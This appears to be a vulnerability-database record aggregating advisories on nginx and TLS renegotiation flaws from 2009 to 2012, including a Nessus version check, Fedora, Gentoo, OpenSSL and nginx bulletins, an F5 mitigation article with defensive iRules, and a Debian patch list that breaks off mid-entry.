Dec 30 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.34-1\n\n - update to 0.6.34\n\n - Thu Dec 4 2008 Michael Schwendt <mschwendt at\n fedoraproject.org> - 0.6.33-2\n\n - Fix inclusion of /usr/share/nginx tree => no unowned\n directories.\n\n - Sun Nov 23 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.33-1\n\n - update to 0.6.33\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=523105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-September/029250.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b45ba97d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nginx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"nginx-0.7.62-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629", "CVE-2009-3555", "CVE-2009-3896"], "description": "Nginx [engine x] is an HTTP(S) server, HTTP(S) reverse proxy and IMAP/POP3 proxy server written by Igor Sysoev. ", "modified": "2009-12-07T07:26:07", "published": "2009-12-07T07:26:07", "id": "FEDORA:E042E10F89C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: nginx-0.7.64-1.fc10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629", "CVE-2009-3555", "CVE-2009-3896"], "description": "Nginx [engine x] is an HTTP(S) server, HTTP(S) reverse proxy and IMAP/POP3 proxy server written by Igor Sysoev. ", "modified": "2009-12-07T07:27:32", "published": "2009-12-07T07:27:32", "id": "FEDORA:5502F10F89D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: nginx-0.7.64-1.fc11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629", "CVE-2009-3555", "CVE-2009-3896"], "description": "Nginx [engine x] is an HTTP(S) server, HTTP(S) reverse proxy and IMAP/POP3 proxy server written by Igor Sysoev. ", "modified": "2009-12-07T07:23:18", "published": "2009-12-07T07:23:18", "id": "FEDORA:37F8D10F892", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: nginx-0.7.64-1.fc12", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629"], "description": "Nginx [engine x] is an HTTP(S) server, HTTP(S) reverse proxy and IMAP/POP3 proxy server written by Igor Sysoev. ", "modified": "2009-09-15T20:59:51", "published": "2009-09-15T20:59:51", "id": "FEDORA:7B89910F87D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: nginx-0.7.62-1.fc11", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629"], "description": "Nginx [engine x] is an HTTP(S) server, HTTP(S) reverse proxy and IMAP/POP3 proxy server written by Igor Sysoev. ", "modified": "2009-09-15T21:01:57", "published": "2009-09-15T21:01:57", "id": "FEDORA:300D410F886", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 10 Update: nginx-0.7.62-1.fc10", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "GnuTLS is a project that aims to develop a library which provides a secure layer, over a reliable transport layer. Currently the GnuTLS library implem ents the proposed standards by the IETF's TLS working group. ", "modified": "2010-06-25T18:15:19", "published": "2010-06-25T18:15:19", "id": "FEDORA:DB226111816", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: gnutls-2.8.6-2.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "openssl": [{"lastseen": "2020-09-14T11:36:47", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": " Implement RFC5746 to address vulnerabilities in SSL/TLS renegotiation.\n\n * Fixed in OpenSSL 0.9.8m (Affected 0.9.8-0.9.8l)\n", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENSSL:CVE-2009-3555", "href": "https://www.openssl.org/news/secadv/20091111.txt", "title": "Vulnerability in OpenSSL CVE-2009-3555", "type": "openssl", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:39:36", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "", "edition": 2, "modified": "2019-06-13T19:54:00", "published": "2013-07-06T01:56:00", "id": "F5:K10737", "href": "https://support.f5.com/csp/article/K10737", "title": "SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2016-05-30T21:02:08", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "edition": 1, "description": "A Man in the Middle attack allows an attacker to inject an arbitrary amount of chosen plain text into the application protocol stream data during a secure session renegotiation that uses SSL version 3.x or TLS version 1.x. This may provide an attacker the ability to perform arbitrary actions on affected websites with user's credentials. This vulnerability does not allow one to decrypt the intercepted network communication.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555>\n\n**Note**: F5 thanks Marsh Ray, who originally identified and reported this vulnerability.\n\nThe IETF has adopted as [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>) a new extension to the TLS standard that addresses this issue. F5 Product Development has implemented this new extension beginning in BIG-IP versions 10.2.3 and 11.0.0.\n\n**Important**: When session renegotiation is disabled, some browsers may log an informational message that appears similar to the following example to the console, when connecting to F5 products:\n\nServer does not support RFC 5746, see CVE-2009-3555\n\nAlthough the message implies that the F5 product to which the browser is connecting is vulnerable to this attack, all vulnerable F5 Products have been patched to disable SSL/TLS renegotiation, and some have been further enhanced to allow explicit control over renegotiation, thus mitigating this attack. For more information regarding completed and planned updates related to this vulnerability, refer to the following table. Note that ID 223836 specifically addresses this error message.\n\nF5 Product Development is tracking this issue as follows:\n\nCR / ID | Description | Affected products | Included in \n---|---|---|--- \nCR132165 / \n \nID 213305 | Introduce the **<disable|enable>** parameter to the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command to control on a per-connection basis how TMM should respond to SSL 3.0/TLS 1.0 renegotiation requests. \n\n\n**Important**: Client-side session renegotiation is still enabled, by default, in versions prior to 10.1.0. In these versions, you must apply an iRule using the **SSL::renegotiate disable **command to each virtual server configuration you wish to protect from this vulnerability. Refer to the mitigation section, following, for more information.\n\n**Note**: For more information, refer to the DevCentral wiki page for the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command.\n\n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEngineering Hotfix available for: \nEnterprise Manager 1.8 \nCR132166 / \n \nID 213306 | Patch OpenSSL to disable midstream session renegotiation. This patch protects the Configuration utility and iControl against this vulnerability. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132167 / \n \nID 213307 | Enable midstream session renegotiation for the **big3d **and **gtmd**. This CR is a companion to CR132166, re-enabling mid-stream session renegotiation for the **big3d **and **gtmd** processes, which maintain long-lived iQuery-over-SSL connections that are renegotiated daily. These connections are mutually authenticated using 2-way SSL authentication prior to exchanging application traffic and, thus, are not vulnerable to the man-in-the-middle attacks described in this Solution. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132170 / \n \nID 213308 | Introduce a Client SSL / ServerSSL profile option to control whether midstream session renegotiation is allowed. In versions 10.1.0 - 10.2.2, the default setting for the Client SSL profile is **disabled**, and the default setting for the Server SSL profile is **enabled**. **Note**: BIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM | BIG-IP 10.1.0 and later \n \nCR132172 / \n \nID 223836 | Implement [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>), an extension to the TLS standard for secure midstream session renegotiation. **Note**: For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 10.2.3 \nBIG-IP 11.0.0 and later \n \nCR132177 / \nID 295760\n\nand\n\nCR132177-1 / \nID 294172\n\n| Patch OpenSSL to disable midstream session renegotiation. | FirePass | \n\nFirePass 7.0.0 and later \nFirePass 6.1.0 HF1 * \nFirePass 6.0.3 hotfix-132177-1 \nFirePass 6.0.2 hotfix-132177-1 \nFirePass 5.5.2 hotfix-132177-1 \nFirePass 5.5.1 hotfix-132177-1 \nFirePass 5.5 hotfix-132177-1 \n \nImportant: For version 6.1.0, the \nfix for this ID was not included in \nHF3 or HF4. Install the latest \ncumulative hotfix. \n \nID 37053 | Patch or upgrade Apache Tomcat to disable session renegotiation. | ARX | ARX 6.2.0 \n \n \nIf a named hotfix has been issued for your software version, you may download the referenced hotfix or later versions of the hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nIf an engineering hotfix has been issued for your software version, you should contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), and reference this Solution number and the associated CR number to request the hotfix.\n\nFor a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nFor information about installing version 10.x hotfixes, refer to SOL10025: Managing BIG-IP product hotfixes (10.x).\n\n**Mitigation steps for BIG-IP LTM, ASM, PSM, Link Controller, WebAccelerator, or WOM SSL virtual servers**\n\nYou can use the Client SSL profile Renegotiation setting or an iRule to disable client-side session renegotiation for virtual servers. Refer to the following section that applies to your version:\n\n**Note**: Applications that require session renegotiation are inherently vulnerable to the attack. Only removal of the renegotiation requirement in the application itself will eliminate the vulnerability. If session renegotiation is disabled by any of the vulnerability mitigation steps described later, without modifying the application, client connections will be dropped. For example, IE 5.0 clients accessing applications which use SGC (Server Gated Cryptography) certificates are known to require renegotiation, and their connections would be disrupted by such a configuration.\n\n**Important**: Any mitigation action that re-enables session re-negotiation on patched vulnerable versions may re-expose your F5 system to this vulnerability. In some cases, iRule logic can be used to control this behavior. Refer to the following sections for details regarding your product and version.\n\n**BIG-IP versions 10.1.0 and later**\n\nBIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. SSL Renegotiation setting is **Enabled,** by default, in the SSL profiles, however, the system requires secure renegotiation of SSL connections. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension.\n\nIn BIG-IP version 10.1.0, the Renegotiation setting was added to the BIG-IP Client session and Server SSL profiles as a result of ID 213308 (formerly CR132180). In versions 10.1.0 - 10.2.2, the Renegotiation setting is **Disabled **by default in the Client SSL profile. Virtual servers using a Client SSL profile with the Renegotiation setting configured to **Disabled **are protected from this vulnerability.\n\nIf necessary, you can selectively enable renegotiation using the **SSL::renegotiate** iRules command on a virtual server that has renegotiation disabled in its Client SSL profile. For example, an iRule similar to the following enables renegotiation only for clients within a single Class C subnet:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nif { [IP::addr [IP::client_addr] equals 192.168.222.0/24] }{ \nSSL::renegotiate enable \n} \n}\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, and 10.1.0 through 10.2.x**\n\nTo mitigate the vulnerability, a BIG-IP system administrator may apply iRules similar to the following to each SSL virtual server. This sample iRule uses the **SSL::renegotiate** command to disable client-side session renegotiation, which prevents the BIG-IP system from processing a secondary session renegotiation request:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nSSL::renegotiate disable \n}\n\nThe **<enable|disable>**parameter was added to the **SSL::renegotiate** command in versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, 10.1.x, and 10.2.0 as a result of ID 213305 (formerly CR132165). In versions prior to 10.1.0, all virtual servers with a Client SSL profile applied will, by default, still accept session renegotiation.\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.4.x, 9.3.x prior to 9.3.1 HF8, and 10.0.x prior to 10.0.1 HF3**\n\nTo mitigate the vulnerability in versions that do not include the **SSL::renegotiate** command, apply an iRule similar to the following to each SSL virtual server. The iRule resets the connection if client-side SSL renegotiation is attempted.\n\nwhen CLIENT_ACCEPTED { \n# initialize TLS/SSL handshake count for this connection \nset sslhandshakecount 0 \n} \nwhen CLIENTSSL_HANDSHAKE priority 1 { \n# a handshake just occurred \nincr sslhandshakecount \n# is this the first handshake in this connection? \nif { $sslhandshakecount > 1 } { \n# log (rate limited) the event (to /var/log/ltm) \nlog \"\\\\[VS [IP::local_addr]:[TCP::local_port] client [IP::remote_addr]:[TCP::remote_port]\\\\]:TLS/SSL renegotiation\" \n# if not, close the clientside connection \nreject \n} \n} \n\n\n**Note**: This example was provided by F5 DevCentral poster Lupo. The original post is available at the following location:\n\n[mitigating the TLS client-initiated renegotiation MITM attack](<http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic>)\n\nA separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n", "modified": "2013-07-05T00:00:00", "published": "2009-11-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html", "id": "SOL10737", "title": "SOL10737 - SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3898", "CVE-2009-3555", "CVE-2011-4315", "CVE-2009-3896", "CVE-2012-1180"], "description": "### Background\n\nnginx is a robust, small, and high performance HTTP and reverse proxy server. \n\n### Description\n\nMultiple vulnerabilities have been found in nginx:\n\n * The TLS protocol does not properly handle session renegotiation requests (CVE-2009-3555). \n * The \"ngx_http_process_request_headers()\" function in ngx_http_parse.c could cause a NULL pointer dereference (CVE-2009-3896). \n * nginx does not properly sanitize user input for the the WebDAV COPY or MOVE methods (CVE-2009-3898). \n * The \"ngx_resolver_copy()\" function in ngx_resolver.c contains a boundary error which could cause a heap-based buffer overflow (CVE-2011-4315). \n * nginx does not properly parse HTTP header responses which could expose sensitive information (CVE-2012-1180). \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the nginx process, cause a Denial of Service condition, create or overwrite arbitrary files, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll nginx users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/nginx-1.0.14\"", "edition": 1, "modified": "2012-03-28T00:00:00", "published": "2012-03-28T00:00:00", "id": "GLSA-201203-22", "href": "https://security.gentoo.org/glsa/201203-22", "type": "gentoo", "title": "nginx: Multiple vulnerabilities", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:02", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2629"], "description": "### Background\n\nnginx is a robust, small and high performance HTTP and reverse proxy server. \n\n### Description\n\nChris Ries reported a heap-based buffer underflow in the ngx_http_parse_complex_uri() function in http/ngx_http_parse.c when parsing the request URI. \n\n### Impact\n\nA remote attacker might send a specially crafted request URI to a nginx server, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the server, or a Denial of Service. NOTE: By default, nginx runs as the \"nginx\" user. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll nginx 0.5.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/nginx-0.5.38\"\n\nAll nginx 0.6.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/nginx-0.6.39\"\n\nAll nginx 0.7.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/nginx-0.7.62\"", "edition": 1, "modified": "2009-09-18T00:00:00", "published": "2009-09-18T00:00:00", "id": "GLSA-200909-18", "href": "https://security.gentoo.org/glsa/200909-18", "type": "gentoo", "title": "nginx: Remote execution of arbitrary code", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nginx": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "software", "cvelist": ["CVE-2009-3896"], "edition": 2, "description": "Null pointer dereference vulnerability\nSeverity: major\nCVE-2009-3896\nNot vulnerable: 0.8.14+, 0.7.62+, 0.6.39+, 0.5.38+\nVulnerable: 0.1.0-0.8.13", "modified": "2009-11-24T17:30:00", "published": "2009-11-24T17:30:00", "id": "NGINX:CVE-2009-3896", "href": "http://nginx.org/en/security_advisories.html", "type": "nginx", "title": "Null pointer dereference vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "software", "cvelist": ["CVE-2009-2629"], "edition": 2, "description": "Buffer underflow vulnerability\nSeverity: major\nCVE-2009-2629\nNot vulnerable: 0.8.15+, 0.7.62+, 0.6.39+, 0.5.38+\nVulnerable: 0.1.0-0.8.14", "modified": "2009-09-15T22:30:00", "published": "2009-09-15T22:30:00", "id": "NGINX:CVE-2009-2629", "href": "http://nginx.org/en/security_advisories.html", "type": "nginx", "title": "Buffer underflow vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:28:35", "description": "BUGTRAQ ID: 36839\r\nCVE(CAN) ID: CVE-2009-3896\r\n\r\nnginx\u662f\u591a\u5e73\u53f0\u7684HTTP\u670d\u52a1\u5668\u548c\u90ae\u4ef6\u4ee3\u7406\u670d\u52a1\u5668\u3002 \r\n\r\nnginx\u670d\u52a1\u5668\u7684src/http/ngx_http_parse.c\u6587\u4ef6\u7684ngx_http_process_request_headers()\u51fd\u6570\u4e2d\u5b58\u5728\u7a7a\u6307\u9488\u5f15\u7528\u9519\u8bef\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u8d85\u957f\u7684URI\u6765\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4worker\u8fdb\u7a0b\u5d29\u6e83\u3002\n\nIgor Sysoev nginx 0.8.x\r\nIgor Sysoev nginx 0.7.x\r\nIgor Sysoev nginx 0.6.x\r\nIgor Sysoev nginx 0.5.x\r\nIgor Sysoev nginx 0.4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1920-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1920-1\uff1aNew nginx packages fix denial of service\r\n\u94fe\u63a5\uff1ahttp://www.debian.org/security/2009/dsa-1920\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13.orig.tar.gz\r\nSize/MD5 checksum: 436610 d385a1e7a23020d421531818d5606b5b\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3.dsc\r\nSize/MD5 checksum: 611 c4e1baf967a3dbb19a28bf2da8c32fdb\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3.diff.gz\r\nSize/MD5 checksum: 6822 794447a883501912bf6f448b9a561293\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_alpha.deb\r\nSize/MD5 checksum: 211432 14edf103968d05ed6b3f0149e790881c\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_amd64.deb\r\nSize/MD5 checksum: 196040 70ac342b4cf946ad70d9914c5bc54d38\r\n\r\narm architecture (ARM)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_arm.deb\r\nSize/MD5 checksum: 187230 0caef4e2898e11690a49eb45a539ad37\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_hppa.deb\r\nSize/MD5 checksum: 205304 05e92ede05223ee00832a7fa22f8712f\r\n\r\ni386 architecture (Intel ia32)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_i386.deb\r\nSize/MD5 checksum: 184404 764b3c087859dcf45d888fe6c7f55176\r\n\r\nia64 architecture (Intel ia64)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_ia64.deb\r\nSize/MD5 checksum: 278594 4ae16a2fe0a790a1eb567aa2a2c909ea\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_mips.deb\r\nSize/MD5 checksum: 208380 a7408a0c1f14f235aec3c9f3a12d5694\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_mipsel.deb\r\nSize/MD5 checksum: 207790 67255cb5b5848c714921d0a44abd449d\r\n\r\npowerpc architecture (PowerPC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_powerpc.deb\r\nSize/MD5 checksum: 186666 a0a0505d498f51d2a63e615e8e3e8fe7\r\n\r\ns390 architecture (IBM S/390)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_s390.deb\r\nSize/MD5 checksum: 199838 b0d4f3cc9878b0280a8e56a0bd29bd53\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+etch3_sparc.deb\r\nSize/MD5 checksum: 185332 9fdd4b7725b4060a311d7f35f9266cfb\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64,\r\nmips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32.orig.tar.gz\r\nSize/MD5 checksum: 522183 c09a2ace3c91f45dabbb608b11e48ed1\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3.dsc\r\nSize/MD5 checksum: 1231 0acea5f6912c80de2c6b54b16c7f008b\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3.diff.gz\r\nSize/MD5 checksum: 10814 a5c652551a6457c8ead36578a5ba59bb\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_alpha.deb\r\nSize/MD5 checksum: 297934 72777a5e04e324eef3f97d93623a4559\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_amd64.deb\r\nSize/MD5 checksum: 268654 8ba00b9fa72c1b6d92ba1f4af5b95e2d\r\n\r\narm architecture (ARM)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_arm.deb\r\nSize/MD5 checksum: 252062 7de60e3654a0aff273d3340dd46e2cda\r\n\r\narmel architecture (ARM EABI)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_armel.deb\r\nSize/MD5 checksum: 252764 f0ba676c131f1fc992e27cf1c50440d7\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\nhttp://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+lenny3_hppa.deb\r\nSize/MD5 checksum: 282454 7d9299fcc9ca9201905790eea2357527\r\n\r\ni386 architecture (Intel 